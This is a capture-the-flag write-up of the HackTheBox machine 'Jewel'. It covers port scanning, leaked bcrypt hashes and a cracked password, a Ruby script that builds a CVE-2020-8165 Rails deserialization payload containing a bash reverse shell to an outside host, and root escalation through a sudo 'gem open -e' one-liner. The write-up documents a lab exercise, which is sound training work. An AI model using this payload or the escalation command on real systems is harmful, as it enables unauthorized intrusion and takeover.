HackTheBox Jewel Write Up
---------------------------------
--- Name : Jewel ----------
--- IP Address : 10.10.10.211 ---
--- Platform : Linux ----------
--- Difficulty : Medium ---------
---------------------------------
Jewel is one of the most innovative machines I have solved on HTB platform, it shows a deserialization vulnerability in rails along with working around google authentication followed by privilege escalation using ruby gems.
Reconnaissance
Fast 1K port scan using FinalRecon followed by service/version enumeration on open ports using nmap...
$ finalrecon --ps http://10.10.10.211
______ __ __ __ ______ __
/\ ___\/\ \ /\ "-.\ \ /\ __ \ /\ \
\ \ __\\ \ \\ \ \-. \\ \ __ \\ \ \____
\ \_\ \ \_\\ \_\\"\_\\ \_\ \_\\ \_____\
\/_/ \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
______ ______ ______ ______ __ __
/\ == \ /\ ___\ /\ ___\ /\ __ \ /\ "-.\ \
\ \ __< \ \ __\ \ \ \____\ \ \/\ \\ \ \-. \
\ \_\ \_\\ \_____\\ \_____\\ \_____\\ \_\\"\_\
\/_/ /_/ \/_____/ \/_____/ \/_____/ \/_/ \/_/
[>] Created By : thewhiteh4t
[>] Version : 1.0.7
[+] Checking for Updates...[ Up-To-Date ]
[+] Target : http://10.10.10.211
[!] Starting Port Scan...
[+] Testing Top 1000 Ports...
[+] 22 ssh
[+] 8080 http-alt
[+] 8000 irdmi
[+] Completed in 0:00:03.191492
$ nmap -p 22,8080,8000 -sV 10.10.10.211 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 21:18 IST
Nmap scan report for 10.10.10.211
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8000/tcp open http Apache httpd 2.4.38
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
On port 8080 there is a blog page, I did not find much in the source code so I moved to port 8000 where i found GitWeb, a simple web visualizer for the git service.
Read More
Further inspecting the page and files I found multiple things...
data:image/s3,"s3://crabby-images/76b89/76b895920e15218b887bfc98b14d89110e10e248" alt=""
Email address of the author is visible along with a possible username "bill", Gemfile and Rakefile can also be seen which are associated with ruby. Inside Gemfile I found the versions of ruby, rails and bcrypt along with other modules...
data:image/s3,"s3://crabby-images/f74d8/f74d8190694061aea518ffb3902258469655b20c" alt=""
On further inspection of visible files I found some hashes in "bd.sql" file...
data:image/s3,"s3://crabby-images/d8788/d8788420c1bc8d11c0d0ef4aabaec8a5c0f107a4" alt=""
bill - $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
jennifer - $2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
Both hashes are bcrypt with 12 rounds, I tried to crack both hashes with john but that did not help so next I started looking for a vulnerability in GitWeb and rails.
CVE-2020-8165
NVD Advisory
A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE. You can read more about the vulnerability in this Hackerone Report. The flaw can be spotted in "users_controller.rb" file on line number 37
data:image/s3,"s3://crabby-images/0ebbe/0ebbe6918e7f02b6046aae4a14fad97d6e81b46d" alt=""
Intrusion
The flaw is in the update functionality of the web application which is being used to update the username in user profile. I signed up in the blog on port 8080 and used the exploit I found here : CVE-2020-8165 Exploit by masahiro331 to write a ruby script which will generate the required payload for getting RCE on the target...
$ cat payload.rb
require 'erb'
require 'uri'
require 'active_support'
require 'active_support/core_ext'
code = '`/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.49/4444 0>&1"`'
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
puts URI.encode_www_form(payload: payload)
data:image/s3,"s3://crabby-images/c03fc/c03fc10c87e6ec0fec1f010652e85701395dba39" alt=""
I sent the payload in the username field of the request I intercepted using burp as you can see below...
data:image/s3,"s3://crabby-images/33cc9/33cc9ba5559549987c97472f2d8a05cda9f59a67" alt=""
In the vulnerable code above, you can see that on line 40 the page is supposed to be redirected to articles page i.e. the home page, payload triggered as soon as I visited the home page and I got foothold!
data:image/s3,"s3://crabby-images/a1d02/a1d023a4dae24868e35807a4aff53cf4e50745a3" alt=""
The username is bill and I got the user flag in home directory.
Enumeration
After some poking around I found a sql file in the following path...
data:image/s3,"s3://crabby-images/7785d/7785d9a75c44cb406acaabd746884c7ac292a67e" alt=""
You can see that although the file is owned by root but its permissions are misconfigured and it is readable, inside I found another bcrypt hash for our user "bill"
data:image/s3,"s3://crabby-images/03fec/03fec07b269e3316964af911e2995ef09f1a859c" alt=""
This hash got cracked successfully using john and I got a password for bill here...
bill:spongebob
Privilege Escalation
First thing I tried was to execute sudo with "-l" flag which lists the privileges of the user but it asks for a verification code! Now I started looking for the origin of this verification system...
data:image/s3,"s3://crabby-images/96c8c/96c8c6d5050ed58c895d01dd216ddba0e108e92b" alt=""
In the home directory I found a dot file, google-authenticator which contains a 26 character long alphanumeric string...
data:image/s3,"s3://crabby-images/6f26c/6f26c787866a450ab3ad98a4a198e00644f2abea" alt=""
Fortunately I use google authenticator app and it offers two methods to add a new entry
data:image/s3,"s3://crabby-images/78579/78579ca12a9ef3617e2a561e9649a4e234128cbf" alt=""
I tried adding the alphanumeric string I found earlier into setup using key option and it worked, google authenticator is now generating codes!
data:image/s3,"s3://crabby-images/3ca3d/3ca3dfd12bfa6fc068824157272d2f990c0d65cf" alt=""
and now I was finally able to use sudo and I found that our user bill can execute gem command!
data:image/s3,"s3://crabby-images/1d7e9/1d7e9574feb6b602b9659c2a9ec80895e3632390" alt=""
I used the following command to escalate privileges...
# https://gtfobins.github.io/gtfobins/gem/
$ sudo gem open -e "/bin/sh -c /bin/bash" rdoc
data:image/s3,"s3://crabby-images/e15a6/e15a68be7de8685956644c1849fba63b71c95dde" alt=""
Solved!